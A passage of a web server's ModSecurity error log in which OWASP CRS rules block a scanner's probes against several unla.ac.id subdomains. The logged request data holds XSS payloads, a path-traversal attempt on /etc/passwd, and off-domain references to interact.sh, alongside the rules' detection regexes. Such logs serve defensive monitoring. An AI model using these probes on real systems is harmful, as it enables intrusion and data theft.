"PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAqqtjcAAAAA"]
[Tue Aug 29 11:55:46.687853 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAqTvyEAAAAa"]
[Tue Aug 29 11:55:46.689572 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAqSw0MAAAAN"]
[Tue Aug 29 11:55:46.741248 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22><svg/o found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAolKwkAAAAe"]
[Tue Aug 29 11:55:46.752282 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAq-HYUAAAAT"]
[Tue Aug 29 11:55:46.773507 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAq@sZoAAAAM"]
[Tue Aug 29 11:55:46.775109 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAolKwoAAAAe"]
[Tue Aug 29 11:55:46.795112 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAqSw0cAAAAN"]
[Tue Aug 29 11:55:46.798928 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAq5@F4AAAAK"]
[Tue Aug 29 11:55:47.539044 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAqTvyUAAAAa"]
[Tue Aug 29 11:55:47.667448 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAqY6JQAAAAr"]
[Tue Aug 29 11:55:47.691384 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAqeFbsAAAAx"]
[Tue Aug 29 11:55:47.768427 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAq@sZ4AAAAM"]
[Tue Aug 29 11:55:47.770818 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAolKw4AAAAe"]
[Tue Aug 29 11:55:47.820622 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16U8Co-f0AAAq@saAAAAAM"]
[Tue Aug 29 11:55:47.832879 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16U8Co-f0AAAqY6JcAAAAr"]
[Tue Aug 29 11:55:47.862065 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16U8Co-f0AAAqqtkIAAAAA"]
[Tue Aug 29 11:55:48.539720 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAq5@GAAAAAK"]
[Tue Aug 29 11:55:48.539862 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16VMCo-f0AAAqqtkQAAAAA"]
[Tue Aug 29 11:55:48.559734 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAq4fXAAAAAJ"]
[Tue Aug 29 11:55:48.586466 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqeFcAAAAAx"]
[Tue Aug 29 11:55:48.586737 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAq5@GIAAAAK"]
[Tue Aug 29 11:55:48.586859 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAqqtkYAAAAA"]
[Tue Aug 29 11:55:48.588710 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqTvyoAAAAa"]
[Tue Aug 29 11:55:48.677481 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqeFcEAAAAx"]
[Tue Aug 29 11:55:48.683253 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAq@saMAAAAM"]
[Tue Aug 29 11:55:48.700900 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAqTvywAAAAa"]
[Tue Aug 29 11:55:48.702627 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqSw04AAAAN"]
[Tue Aug 29 11:55:48.702781 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAqY6KcAAAAr"]
[Tue Aug 29 11:55:50.093746 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16VsCo-f0AAAq@sagAAAAM"]
[Tue Aug 29 11:55:50.106460 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] 